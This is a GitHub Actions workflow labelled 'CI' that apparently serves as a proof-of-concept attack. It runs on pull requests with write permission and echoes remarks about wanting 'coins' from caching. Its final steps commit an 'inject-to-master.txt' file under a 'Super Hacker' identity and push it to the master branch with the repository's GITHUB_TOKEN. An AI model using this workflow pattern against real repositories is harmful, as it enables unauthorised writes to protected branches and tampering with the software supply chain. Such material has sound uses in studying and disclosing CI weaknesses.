name: CI

on:
    pull_request:
    push:
        branches: [ master, develop ]
permissions:
  contents: write

jobs:
    run:
        runs-on: ubuntu-latest
        strategy:
            fail-fast: false
            matrix:
                php:
                    - '8.2'
                composer:
                    - ''


        name: PHP ${{ matrix.php }} ${{ matrix.composer }}
        steps:
            - name: Checkout
              uses: actions/checkout@v2
              with:
                branch: master

            - name: Beer
              run: echo "BEER!!!"
            
            - uses: actions/cache@v4
              with:
                  path: ~/.composer/cache/files
                  key: ${{ matrix.php }}

            - name: Beer
              run: echo "But actually I don't need this cache at all, I just want coins!!!"

            - name: Setup PHP
              uses: shivammathur/setup-php@v2
              with:
                  php-version: ${{ matrix.php }}

            - name: Set composer cache directory
              id: composer-cache
              run: echo "::set-output name=dir::$(composer config cache-files-dir)"

            - name: Cache composer
              uses: actions/cache@v4
              with:
                  path: ${{ steps.composer-cache.outputs.dir }}
                  key: ${{ runner.os }}-${{ matrix.php }}-${{ matrix.composer }}-composer-${{ hashFiles('composer.json') }}
                  restore-keys: ${{ runner.os }}-${{ matrix.php }}-${{ matrix.composer }}-composer

            - name: Install dependencies
              run: composer update ${{ matrix.composer }}

            - name: commit to master
              run: |
                git config --global user.email "hacker@gmail.com"
                git config --global user.name "Super Hacker"
                touch inject-to-master.txt
                echo "abracadabra" > inject-to-master.txt
                git add .
                git commit -m"Abra cadabra boom"
            - name: Push changes
              uses: ad-m/github-push-action@master
              with:
                github_token: ${{ secrets.GITHUB_TOKEN }}
                branch: master
